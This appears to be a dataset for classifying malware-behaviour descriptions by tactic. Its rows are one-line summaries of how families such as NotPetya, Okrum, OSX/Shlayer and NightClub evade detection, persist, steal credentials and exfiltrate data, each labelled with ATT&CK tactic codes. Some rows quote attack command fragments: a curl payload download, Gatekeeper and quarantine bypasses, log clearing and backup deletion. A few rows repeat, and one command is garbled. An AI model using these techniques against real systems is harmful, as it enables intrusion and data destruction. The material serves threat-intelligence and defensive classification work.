"Netwalker's PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the Netwalker DLL being loaded into memory.",['TA0005:Defense Evasion']
Netwalker can detect and terminate active security software-related processes on infected systems.,['TA0005:Defense Evasion']
The Netwalker DLL has been injected reflectively into the memory of a legitimate running process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Netwalker's DLL has been embedded within the PowerShell script in hex format.,['TA0005:Defense Evasion']
Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.,['TA0011:Command and Control']
Netwalker can delete the infected system's Shadow Volumes to prevent recovery.,['TA0040:Impact']
Operators deploying Netwalker have used psexec to copy the Netwalker payload across accessible systems.,['TA0008:Lateral Movement']
Netwalker can add the following registry entry: HKEY_CURRENT_USER\SOFTWARE\{8 random characters}.,['TA0005:Defense Evasion']
Netwalker can use Windows API functions to inject the ransomware DLL.,['TA0002:Execution']
"Netwalker has been written in PowerShell and executed directly in memory, avoiding detection.",['TA0002:Execution']
Netwalker can detect and terminate active security software-related processes on infected systems.,['TA0007:Discovery']
Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.,['TA0002:Execution']
"Netwalker can terminate system processes and services, some of which relate to backup software.",['TA0040:Impact']
Netwalker can determine the system architecture it is running on to choose which version of the DLL to use.,['TA0007:Discovery']
Operators deploying Netwalker have used batch scripts to retrieve the Netwalker payload.,['TA0002:Execution']
Netwalker can use WMI to delete Shadow Volumes.,['TA0002:Execution']
Nidiran can download and execute files.,['TA0011:Command and Control']
"Nidiran can create a new service named msamger , which mimics the legitimate Microsoft database by the same name.",['TA0005:Defense Evasion']
Nidiran can create a new service named msamger .,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
NightClub can use `GetForegroundWindow` to enumerate the active window.,['TA0007:Discovery']
NightClub can load a module to leverage the LAME encoder and `mciSendStringW` to control and capture audio.,['TA0009:Collection']
NightClub can use a DNS tunneling plugin to exfiltrate data by adding it to the subdomain portion of a DNS request.,['TA0011:Command and Control']
NightClub can use a file monitor to steal specific files from targeted systems.,['TA0009:Collection']
NightClub can use SMTP and DNS for file exfiltration and C2.,['TA0010:Exfiltration']
"NightClub can use a file monitor to identify .lnk, .doc, .docx, .xls, .xslx, and .pdf files.",['TA0007:Discovery']
NightClub can load multiple additional plugins on an infected host.,['TA0011:Command and Control']
NightClub can use a plugin for keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
NightClub has copied captured files and keystrokes to the `%TEMP%` directory of compromised hosts.,['TA0009:Collection']
NightClub can use emails for C2 communications.,['TA0011:Command and Control']
NightClub has created a service named `WmdmPmSp` to spoof a Windows Media service.,['TA0005:Defense Evasion']
NightClub has chosen file names to appear legitimate including EsetUpdate-0117583943.exe for its dropper.,['TA0005:Defense Evasion']
NightClub can modify the Registry to set the ServiceDLL for a service created by the malware for persistence.,['TA0005:Defense Evasion']
"NightClub can use multiple native APIs including `GetKeyState`, `GetForegroundWindow`, `GetWindowThreadProcessId`, and `GetKeyboardLayout`.",['TA0002:Execution']
"NightClub has used a non-standard encoding in DNS tunneling removing any `=` from the result of base64 encoding, and replacing `/` characters with `-s` and `+` characters with `-p`.",['TA0011:Command and Control']
NightClub can obfuscate strings using the congruential generator `: staten+1 = mod 232`.,['TA0005:Defense Evasion']
NightClub has the ability to monitor removable drives.,['TA0007:Discovery']
NightClub has the ability to use `GetWindowThreadProcessId` to identify the process behind a specified window.,['TA0007:Discovery']
NightClub can load a module to call `CreateCompatibleDC` and `GdipSaveImageToStream` for screen capture.,['TA0009:Collection']
"NightClub can modify the Creation, Access, and Write timestamps for malicious DLLs to match those of the genuine Windows DLL user32.dll.",['TA0005:Defense Evasion']
NightClub has created a Windows service named `WmdmPmSp` to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Nightdoor uses TCP and UDP communication for command and control traffic.,['TA0011:Command and Control']
Nightdoor stores network configuration data in a file XOR encoded with the key value of `0x7A`.,['TA0005:Defense Evasion']
Nightdoor can self-delete.,['TA0005:Defense Evasion']
Nightdoor uses a legitimate executable to load a malicious DLL file for installation.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Nightdoor can collect information on installed applications via Windows registry keys, as well as collecting information on running processes.",['TA0007:Discovery']
Nightdoor uses scheduled tasks for persistence to load the final malware payload into memory.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Nightdoor embeds code from the public `al-khaser` project, a repository that works to detect virtual machines, sandboxes, and malware analysis environments.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Nightdoor gathers information on the victim system such as CPU and Computer name as well as device drivers. Nightdoor can also collect information about disk drives, their total and free space, and file system type.",['TA0007:Discovery']
Nightdoor gathers information on victim system network configuration such as MAC addresses.,['TA0007:Discovery']
Nightdoor gathers information on victim system users and usernames.,['TA0007:Discovery']
Nightdoor can identify the system local time information.,['TA0007:Discovery']
Nightdoor can utilize Microsoft OneDrive or Google Drive for command and control purposes.,['TA0011:Command and Control']
Nightdoor creates a cmd.exe shell to send and receive commands from the command and control server via open pipes.,['TA0002:Execution']
Ninja loaders can be side-loaded with legitimate and signed executables including the VLC.exe media player.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ninja has the ability to modify headers and URL paths to hide malicious traffic in HTTP requests.,['TA0011:Command and Control']
The Ninja loader component can decrypt and decompress the payload.,['TA0005:Defense Evasion']
The Ninja payload is XOR encrypted and compressed. Ninja has also XORed its configuration data with a constant value of `0xAA` and compressed it with the LZSS algorithm.,['TA0005:Defense Evasion']
Ninja can store its final payload in the Registry under `$HKLM\SOFTWARE\Classes\Interface\` encrypted with a dynamically generated key based on the drive’s serial number.,['TA0005:Defense Evasion']
Ninja has the ability to enumerate directory content.,['TA0007:Discovery']
Ninja can use pipes to redirect the standard input and the standard output.,['TA0002:Execution']
Ninja can proxy C2 communications including to and from internal agents without internet connectivity.,['TA0011:Command and Control']
Ninja has gained execution through victims opening malicious executable files embedded in zip archives.,['TA0002:Execution']
Ninja has used legitimate looking filenames for its loader including update.dll and x64.dll.,['TA0005:Defense Evasion']
Ninja has the ability to use a proxy chain with up to 255 hops when using TCP.,['TA0011:Command and Control']
"The Ninja loader can call Windows APIs for discovery, process injection, and payload decryption.",['TA0002:Execution']
Ninja can forward TCP packets between the C2 and a remote host.,['TA0011:Command and Control']
Ninja can encode C2 communications with a base64 algorithm using a custom alphabet.,['TA0011:Command and Control']
Ninja can enumerate processes on a targeted host.,['TA0007:Discovery']
Ninja has the ability to inject an agent module into a new process and arbitrary shellcode into running processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Ninja has the ability to mimic legitimate services with customized HTTP URL paths and headers to hide malicious traffic.,['TA0011:Command and Control']
Ninja loader components can be executed through rundll32.exe.,['TA0005:Defense Evasion']
Ninja can configure its agent to work only in specific time frames.,['TA0010:Exfiltration']
Ninja has been distributed to victims via the messaging app Telegram.,['TA0001:Initial Access']
Ninja can XOR and AES encrypt C2 messages.,['TA0011:Command and Control']
Ninja can obtain the computer name and information on the OS and physical drives from targeted hosts.,['TA0007:Discovery']
Ninja can enumerate the IP address on compromised systems.,['TA0007:Discovery']
Ninja can change or create the last access or write times.,['TA0005:Defense Evasion']
Ninja can use HTTP for C2 communications.,['TA0011:Command and Control']
Ninja can create the services `httpsvc` and `w3esvc` for persistence .,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Nltest may be used to enumerate trusted domains by using commands such as nltest /domain_trusts.,['TA0007:Discovery']
Nltest may be used to enumerate remote domain controllers using options such as /dclist and /dsgetdc.,['TA0007:Discovery']
Nltest may be used to enumerate the parent domain of a local machine using /parentdomain.,['TA0007:Discovery']
NotPetya uses wevtutil to clear the Windows event logs.,['TA0005:Defense Evasion']
NotPetya encrypts user files and disk structures like the MBR with 2048-bit RSA.,['TA0040:Impact']
"NotPetya can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network.",['TA0008:Lateral Movement']
NotPetya searches for files ending with dozens of different file extensions prior to encryption.,['TA0007:Discovery']
NotPetya contains a modified version of Mimikatz to help gather credentials that are later used for lateral movement.,['TA0006:Credential Access']
NotPetya can use valid credentials with PsExec or wmic to spread itself to remote systems.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
NotPetya drops PsExec with the filename dllhost.dat.,['TA0005:Defense Evasion']
NotPetya uses rundll32.exe to install itself on remote systems when accessed via PsExec or wmic.,['TA0005:Defense Evasion']
"NotPetya can use PsExec, which interacts with the ADMIN$ network share to execute commands on remote systems.",['TA0008:Lateral Movement']
NotPetya creates a task to reboot the system one hour after infection.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
NotPetya determines if specific antivirus programs are running on an infected host machine.,['TA0007:Discovery']
NotPetya can use PsExec to help propagate itself across a network.,['TA0002:Execution']
NotPetya will reboot the system one hour after infection.,['TA0040:Impact']
NotPetya can use wmic to help propagate itself across a network.,['TA0002:Execution']
OLDBAIT collects credentials from several email clients.,['TA0006:Credential Access']
"OLDBAIT collects credentials from Internet Explorer, Mozilla Firefox, and Eudora.",['TA0006:Credential Access']
OLDBAIT can use SMTP for C2.,['TA0011:Command and Control']
"OLDBAIT installs itself in %ALLUSERPROFILE%\\Application Data\Microsoft\MediaPlayer\updatewindws.exe; the directory name is missing a space and the file name is missing the letter ""o.""",['TA0005:Defense Evasion']
OLDBAIT obfuscates internal strings and unpacks them at startup.,['TA0005:Defense Evasion']
OLDBAIT can use HTTP for C2.,['TA0011:Command and Control']
OSInfo enumerates local and domain users,['TA0007:Discovery']
OSInfo specifically looks for Domain Admins and power users within the domain.,['TA0007:Discovery']
OSInfo enumerates local and domain users,['TA0007:Discovery']
OSInfo has enumerated the local administrators group.,['TA0007:Discovery']
OSInfo discovers shares on the network,['TA0007:Discovery']
OSInfo queries the registry to look for information about Terminal Services.,['TA0007:Discovery']
OSInfo performs a connection test to discover remote systems in the network,['TA0007:Discovery']
OSInfo discovers information about the infected machine.,['TA0007:Discovery']
OSInfo discovers the current domain information.,['TA0007:Discovery']
OSInfo enumerates the current network connections similar to net use .,['TA0007:Discovery']
OSX/Shlayer can install malicious Safari browser extensions to serve ads.,['TA0003:Persistence']
OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads. Versions of OSX/Shlayer pass encrypted and password-protected code to openssl and then write the payload to the /tmp folder.,['TA0005:Defense Evasion']
OSX/Shlayer can escalate privileges to root by asking the user for credentials.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"OSX/Shlayer has used the command appDir=""$)"" and $"") to construct installation paths.",['TA0007:Discovery']
"If running with elevated privileges, OSX/Shlayer has used the spctl command to disable Gatekeeper protection for a downloaded file. OSX/Shlayer can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. OSX/Shlayer has been Notarized by Apple, resulting in successful passing of additional Gatekeeper checks.",['TA0005:Defense Evasion']
OSX/Shlayer has executed a .command script from a hidden directory in a mounted DMG.,['TA0005:Defense Evasion']
"OSX/Shlayer has used the mktemp utility to make random and unique filenames for payloads, such as export tmpDir=""$"" or mktemp -t Installer.",['TA0005:Defense Evasion']
OSX/Shlayer has used the `nohup` command to instruct executed payloads to ignore hangup signals.,['TA0005:Defense Evasion']
"OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the curl -fsL ""$url"" >$tmp_path command to download malicious payloads into a temporary directory.",['TA0011:Command and Control']
"OSX/Shlayer can use the chmod utility to set a file as executable, such as chmod 777 or chmod +x.",['TA0005:Defense Evasion']
OSX/Shlayer has relied on users mounting and executing a malicious DMG file.,['TA0002:Execution']
OSX/Shlayer can masquerade as a Flash Player update.,['TA0005:Defense Evasion']
"OSX/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.",['TA0005:Defense Evasion']
"OSX/Shlayer has collected the IOPlatformUUID, session UID, and the OS version using the command sw_vers -productVersion.",['TA0007:Discovery']
"OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX/Shlayer uses the command sh -c tail -c +1381... to extract bytes at an offset from a specified file. OSX/Shlayer uses the curl -fsL ""$url"" >$tmp_path command to download malicious payloads into a temporary directory.",['TA0002:Execution']
OSX_OCEANLOTUS.D has used AES in CBC mode to encrypt collected data when saving that data to disk.,['TA0009:Collection']
OSX_OCEANLOTUS.D scrambles and encrypts data using AES256 before sending it to the C2 server.,['TA0009:Collection']
OSX_OCEANLOTUS.D has the ability to upload files from a compromised host.,['TA0009:Collection']
"OSX_OCEANLOTUS.D uses a decode routine combining bit shifting and XOR operations with a variable key that depends on the length of the string that was encoded. If the computation for the variable XOR key turns out to be 0, the default XOR key of 0x1B is used. This routine is also referenced as the `rotate` function in reporting.",['TA0005:Defense Evasion']
OSX_OCEANLOTUS.D encrypts its strings in RSA256 and encodes them in a custom base64 scheme and XOR.,['TA0005:Defense Evasion']
OSX_OCEANLOTUS.D has a command to delete a file from the system. OSX_OCEANLOTUS.D deletes the app bundle and dropper after execution.,['TA0005:Defense Evasion']
OSX_OCEANLOTUS.D uses the command xattr -d com.apple.quarantine to remove the quarantine file attribute used by Gatekeeper.,['TA0005:Defense Evasion']
OSX_OCEANLOTUS.D sets the main loader file’s attributes to hidden.,['TA0005:Defense Evasion']
OSX_OCEANLOTUS.D has a command to download and execute a file on the victim’s machine.,['TA0011:Command and Control']
OSX_OCEANLOTUS.D can create a persistence file in the folder /Library/LaunchAgents.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"If running with root permissions, OSX_OCEANLOTUS.D can create a persistence file in the folder /Library/LaunchDaemons.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
OSX_OCEANLOTUS.D has changed permissions of a second-stage payload to an executable via chmod.,['TA0005:Defense Evasion']
OSX_OCEANLOTUS.D has disguised it's true file structure as an application bundle by adding special characters to the filename and using the icon for legitimate Word documents.,['TA0005:Defense Evasion']
"OSX_OCEANLOTUS.D uses file naming conventions with associated executable locations to blend in with the macOS TimeMachine and OpenSSL services. Such as, naming a LaunchAgent plist file `com.apple.openssl.plist` which executes OSX_OCEANLOTUS.D from the user's `~/Library/OpenSSL/` folder upon user login.",['TA0005:Defense Evasion']
OSX_OCEANLOTUS.D has used a custom binary protocol over port 443 for C2 traffic.,['TA0011:Command and Control']
OSX_OCEANLOTUS.D has used a custom binary protocol over TCP port 443 for C2.,['TA0011:Command and Control']
OSX_OCEANLOTUS.D uses PowerShell scripts.,['TA0002:Execution']
"For network communications, OSX_OCEANLOTUS.D loads a dynamic library using `dlopen` and obtains a function pointer to execute within that shared library using `dlsym`.",['TA0002:Execution']
OSX_OCEANLOTUS.D has a variant that is packed with UPX.,['TA0005:Defense Evasion']
OSX_OCEANLOTUS.D has used `zlib` to compress all data after 0x52 for the custom TCP C2 protocol.,['TA0011:Command and Control']
OSX_OCEANLOTUS.D encrypts data sent back to the C2 using AES in CBC mode with a null initialization vector and a key sent from the server that is padded to 32 bytes.,['TA0011:Command and Control']
"OSX_OCEANLOTUS.D checks a number of system parameters to see if it is being run on real hardware or in a virtual machine environment, such as `sysctl hw.model` and the kernel boot time.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"OSX_OCEANLOTUS.D collects processor information, memory information, computer name, hardware UUID, serial number, and operating system version. OSX_OCEANLOTUS.D has used the ioreg command to gather some of this information.",['TA0007:Discovery']
OSX_OCEANLOTUS.D can collect the network interface MAC address on the infected host.,['TA0007:Discovery']
OSX_OCEANLOTUS.D can use the touch -t command to change timestamps.,['TA0005:Defense Evasion']
OSX_OCEANLOTUS.D uses a shell script as the main executable inside an app bundle and drops an embedded base64-encoded payload to the /tmp folder.,['TA0002:Execution']
OSX_OCEANLOTUS.D uses Word macros for execution.,['TA0002:Execution']
OSX_OCEANLOTUS.D can also use use HTTP POST and GET requests to send and receive C2 information.,['TA0011:Command and Control']
ObliqueRAT can break large files of interest into smaller chunks to prepare them for exfiltration.,['TA0010:Exfiltration']
ObliqueRAT has the ability to extract data from removable devices connected to the endpoint.,['TA0009:Collection']
ObliqueRAT has the ability to recursively enumerate files on an infected endpoint.,['TA0007:Discovery']
"ObliqueRAT can copy specific files, webcam captures, and screenshots to local directories.",['TA0009:Collection']
ObliqueRAT has gained execution on targeted systems through luring users to click on links to malicious URLs.,['TA0002:Execution']
ObliqueRAT can discover pluggable/removable drives to extract files from.,['TA0007:Discovery']
ObliqueRAT can check for blocklisted process names on a compromised host.,['TA0007:Discovery']
ObliqueRAT can gain persistence by a creating a shortcut in the infected user's Startup directory.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ObliqueRAT can capture a screenshot of the current screen.,['TA0009:Collection']
ObliqueRAT can hide its payload in BMP images hosted on compromised websites.,['TA0005:Defense Evasion']
ObliqueRAT can halt execution if it identifies processes belonging to virtual machine software or analysis tools.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
ObliqueRAT has the ability to check for blocklisted computer names on infected endpoints.,['TA0007:Discovery']
ObliqueRAT can check for blocklisted usernames on infected endpoints.,['TA0007:Discovery']
ObliqueRAT can capture images from webcams on compromised hosts.,['TA0009:Collection']
OceanSalt can delete files from the system.,['TA0005:Defense Evasion']
OceanSalt can extract drive information from the endpoint and search files on the system.,['TA0007:Discovery']
OceanSalt can encode data with a NOT operation before sending the data to the control server.,['TA0011:Command and Control']
OceanSalt can collect the name and ID for every process running on the system.,['TA0007:Discovery']
OceanSalt has been delivered via spearphishing emails with Microsoft Office attachments.,['TA0001:Initial Access']
OceanSalt can collect the computer name from the system.,['TA0007:Discovery']
OceanSalt can collect the victim’s IP address.,['TA0007:Discovery']
OceanSalt can create a reverse shell on the infected endpoint using cmd.exe. OceanSalt has been executed via malicious macros.,['TA0002:Execution']
Octopus has compressed data before exfiltrating it using a tool called Abbrevia.,['TA0009:Collection']
Octopus can exfiltrate files from the system using a documents collector tool.,['TA0009:Collection']
Octopus has uploaded stolen files and data from a victim's machine over its C2 channel.,['TA0010:Exfiltration']
Octopus has exfiltrated data to file sharing sites.,['TA0010:Exfiltration']
Octopus can collect information on the Windows directory and searches for compressed RAR files on the host.,['TA0007:Discovery']
Octopus can download additional files and tools onto the victim’s machine.,['TA0011:Command and Control']
Octopus has stored collected information in the Application Data directory on a compromised host.,['TA0009:Collection']
Octopus has relied upon users clicking on a malicious attachment delivered through spearphishing.,['TA0002:Execution']
"Octopus has been disguised as legitimate programs, such as Java and Telegram Messenger.",['TA0005:Defense Evasion']
Octopus achieved persistence by placing a malicious executable in the startup directory and has added the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key to the Registry.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Octopus can capture screenshots of the victims’ machine.,['TA0009:Collection']
Octopus has been delivered via spearsphishing emails.,['TA0001:Initial Access']
Octopus has encoded C2 communications in Base64.,['TA0011:Command and Control']
"Octopus can collect system drive information, the computer name, the size of the disk, OS version, and OS architecture information.",['TA0007:Discovery']
Octopus can collect the host IP address from the victim’s machine.,['TA0007:Discovery']
Octopus can collect the username from the victim’s machine.,['TA0007:Discovery']
Octopus has used HTTP GET and POST requests for C2 communications.,['TA0011:Command and Control']
Octopus has used wmic.exe for local discovery information.,['TA0002:Execution']
Okrum has used a custom implementation of AES encryption to encrypt collected data.,['TA0009:Collection']
Okrum was seen using a RAR archiver tool to compress/decompress data.,['TA0009:Collection']
Okrum was seen using modified Quarks PwDump to perform credential dumping.,['TA0006:Credential Access']
"Okrum leverages the HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.",['TA0011:Command and Control']
"Okrum's loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption.",['TA0005:Defense Evasion']
Data exfiltration is done by Okrum using the already opened channel with the C2 server.,['TA0010:Exfiltration']
"Okrum can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.",['TA0011:Command and Control']
Okrum's backdoor deletes files after they have been successfully uploaded to C2 servers.,['TA0005:Defense Evasion']
Okrum has used DriveLetterView to enumerate drive information.,['TA0007:Discovery']
"Before exfiltration, Okrum's backdoor has used hidden files to store logs and outputs from backdoor commands.",['TA0005:Defense Evasion']
"Okrum has built-in commands for uploading, downloading, and executing files to the system.",['TA0011:Command and Control']
Okrum was seen using a keylogger tool to capture keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
Okrum was seen using MimikatzLite to perform credential dumping.,['TA0006:Credential Access']
Okrum can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.,['TA0005:Defense Evasion']
"Okrum leverages the HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.",['TA0011:Command and Control']
Okrum establishes persistence by creating a .lnk shortcut to itself in the Startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Okrum's installer can attempt to achieve persistence by creating a scheduled task.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Okrum's loader can create a new service named NtmsSvc to execute the payload.,['TA0002:Execution']
Okrum can establish persistence by creating a .lnk shortcut to itself in the Startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Okrum has used base64 to encode C2 communication.,['TA0011:Command and Control']
"Okrum's payload is encrypted and embedded within its loader, or within a legitimate PNG file.",['TA0005:Defense Evasion']
Okrum uses AES to encrypt network traffic. The key can be hardcoded or negotiated with the C2 server in the registration phase.,['TA0011:Command and Control']
Okrum's loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Okrum can collect computer name, locale information, and information about the OS and architecture.",['TA0007:Discovery']
"Okrum can collect network information, including the host IP address, DNS, and proxy information.",['TA0007:Discovery']
Okrum was seen using NetSess to discover NetBIOS sessions.,['TA0007:Discovery']
Okrum can collect the victim username.,['TA0007:Discovery']
Okrum can obtain the date and time of the compromised system.,['TA0007:Discovery']
"Okrum's loader can detect presence of an emulator by using two calls to GetTickCount API, and checking whether the time has been accelerated.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Okrum can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Okrum loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Okrum uses HTTP for communication with its C2.,['TA0011:Command and Control']
Okrum's backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.,['TA0002:Execution']
"To establish persistence, Okrum can install itself as a new service named NtmSsvc.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Olympic Destroyer will attempt to clear the System and Security event logs using wevtutil.,['TA0005:Defense Evasion']
Olympic Destroyer contains a module that tries to obtain stored credentials from web browsers.,['TA0006:Credential Access']
Olympic Destroyer overwrites files locally and on remote shares.,['TA0040:Impact']
"Olympic Destroyer uses the native Windows utilities vssadmin, wbadmin, and bcdedit to delete and disable operating system recovery features such as the Windows backup catalog and Windows Automatic Repair.",['TA0040:Impact']
"Olympic Destroyer contains a module that tries to obtain credentials from LSASS, similar to Mimikatz. These credentials are used with PsExec and Windows Management Instrumentation to help the malware propagate itself across a network.",['TA0006:Credential Access']
Olympic Destroyer attempts to copy itself to remote machines on the network.,['TA0008:Lateral Movement']
Olympic Destroyer will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares.,['TA0007:Discovery']
Olympic Destroyer uses Windows Management Instrumentation to enumerate all systems in the network.,['TA0007:Discovery']
Olympic Destroyer uses PsExec to interact with the ADMIN$ network share to execute commands on remote systems.,['TA0008:Lateral Movement']
Olympic Destroyer utilizes PsExec to help propagate itself across a network.,['TA0002:Execution']
Olympic Destroyer uses the API call ChangeServiceConfigW to disable all services on the affected system.,['TA0040:Impact']
Olympic Destroyer uses API calls to enumerate the infected system's ARP table.,['TA0007:Discovery']
Olympic Destroyer will shut down the compromised system after it is done modifying system configuration settings.,['TA0040:Impact']
Olympic Destroyer uses WMI to help propagate itself across a network.,['TA0002:Execution']
OnionDuke can use a custom decryption algorithm to decrypt strings.,['TA0005:Defense Evasion']
OnionDuke has the capability to use a Denial of Service module.,['TA0040:Impact']
OnionDuke steals credentials from its victims.,['TA0006:Credential Access']
OnionDuke uses Twitter as a backup C2.,['TA0011:Command and Control']
OnionDuke uses HTTP and HTTPS for C2.,['TA0011:Command and Control']
OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server.,['TA0009:Collection']
OopsIE compresses collected files with GZipStream before sending them to its C2 server.,['TA0009:Collection']
OopsIE exfiltrates command output and collected files to its C2 server in 1500-byte blocks.,['TA0010:Exfiltration']
OopsIE concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.,['TA0005:Defense Evasion']
OopsIE can upload files from the victim's machine to its C2 server.,['TA0010:Exfiltration']
OopsIE has the capability to delete files and scripts from the victim's machine.,['TA0005:Defense Evasion']
OopsIE can download files from its C2 server to the victim's machine.,['TA0011:Command and Control']
OopsIE stages the output from command execution and collected files in specific folders before exfiltration.,['TA0009:Collection']
OopsIE uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2. OopsIE also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings.,['TA0005:Defense Evasion']
OopsIE creates a scheduled task to run itself every three minutes.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
OopsIE uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.,['TA0005:Defense Evasion']
OopsIE encodes data in hexadecimal format over the C2 channel.,['TA0011:Command and Control']
OopsIE performs several anti-VM and sandbox checks on the victim's machine. One technique the group has used was to perform a WMI query SELECT * FROM MSAcpi_ThermalZoneTemperature to check the temperature to see if it’s running in a virtual environment.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"OopsIE checks for information on the CPU fan, temperature, mouse, hard disk, and motherboard as part of its anti-VM checks.",['TA0007:Discovery']
"OopsIE checks to see if the system is configured with ""Daylight"" time and checks for a specific region to be set for the timezone.",['TA0007:Discovery']
OopsIE creates and uses a VBScript as part of its persistent execution.,['TA0002:Execution']
OopsIE uses HTTP for C2 communications.,['TA0011:Command and Control']
OopsIE uses the command prompt to execute commands on the victim's machine.,['TA0002:Execution']
OopsIE uses WMI to perform discovery techniques.,['TA0002:Execution']
Orz has used Technet and Pastebin web pages for command and control.,['TA0011:Command and Control']
Orz can gather victim drive information.,['TA0007:Discovery']
Orz can overwrite Registry settings to reduce its visibility on the victim.,['TA0005:Defense Evasion']
Orz can download files onto the victim.,['TA0011:Command and Control']
Orz can perform Registry operations.,['TA0005:Defense Evasion']
"Some Orz strings are base64 encoded, such as the embedded DLL known as MockDll.",['TA0005:Defense Evasion']
Orz can gather a process list from the victim.,['TA0007:Discovery']
Some Orz versions have an embedded DLL known as MockDll that uses process hollowing and Regsvr32 to execute another payload.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload.,['TA0005:Defense Evasion']
Orz can gather the victim's Internet Explorer version.,['TA0007:Discovery']
Orz can gather the victim OS version and whether it is 64 or 32 bit.,['TA0007:Discovery']
Orz can gather victim proxy information.,['TA0007:Discovery']
Orz can execute shell commands. Orz can execute commands with JavaScript.,['TA0002:Execution']
Out1 can copy files and Registry data from compromised hosts.,['TA0009:Collection']
Out1 can parse e-mails on a target machine.,['TA0009:Collection']
Out1 has the ability to encode data.,['TA0005:Defense Evasion']
Out1 can use HTTP and HTTPS in communications with remote hosts.,['TA0011:Command and Control']
Out1 can use native command line for execution.,['TA0002:Execution']
OutSteel was developed using the AutoIT scripting language.,['TA0002:Execution']
OutSteel can automatically scan for and collect files with specific extensions.,['TA0009:Collection']
OutSteel can automatically upload collected files to its C2 server.,['TA0010:Exfiltration']
OutSteel can collect information from a compromised host.,['TA0009:Collection']
OutSteel can upload files from a compromised host over its C2 channel.,['TA0010:Exfiltration']
OutSteel can delete itself following the successful execution of a follow-on payload.,['TA0005:Defense Evasion']
"OutSteel can search for specific file extensions, including zipped files.",['TA0007:Discovery']
OutSteel can download files from its C2 server.,['TA0011:Command and Control']
OutSteel can download the Saint Bot malware for follow-on execution.,['TA0008:Lateral Movement']
OutSteel has relied on a user to execute a malicious attachment delivered via spearphishing.,['TA0002:Execution']
OutSteel has relied on a user to click a malicious link within a spearphishing email.,['TA0002:Execution']
OutSteel attempts to download and execute Saint Bot to a statically-defined location attempting to mimic svchost: %TEMP%\\svjhost.exe.,['TA0005:Defense Evasion']
OutSteel can identify running processes on a compromised host.,['TA0007:Discovery']
OutSteel has been distributed as a malicious attachment within a spearphishing email.,['TA0001:Initial Access']
OutSteel has been distributed through malicious links contained within spearphishing emails.,['TA0001:Initial Access']
OutSteel has used HTTP for C2 communications.,['TA0011:Command and Control']
OutSteel has used `cmd.exe` to scan a compromised host for specific file extensions.,['TA0002:Execution']
OwaAuth DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.,['TA0009:Collection']
OwaAuth has a command to list its directory and logical drives.,['TA0007:Discovery']
OwaAuth has been loaded onto Exchange servers and disguised as an ISAPI filter . The IIS w3wp.exe process then loads the malicious DLL.,['TA0003:Persistence']
"OwaAuth captures and DES-encrypts credentials before writing the username and password to a log file, C:\log.txt.","['TA0009:Collection', 'TA0006:Credential Access']"
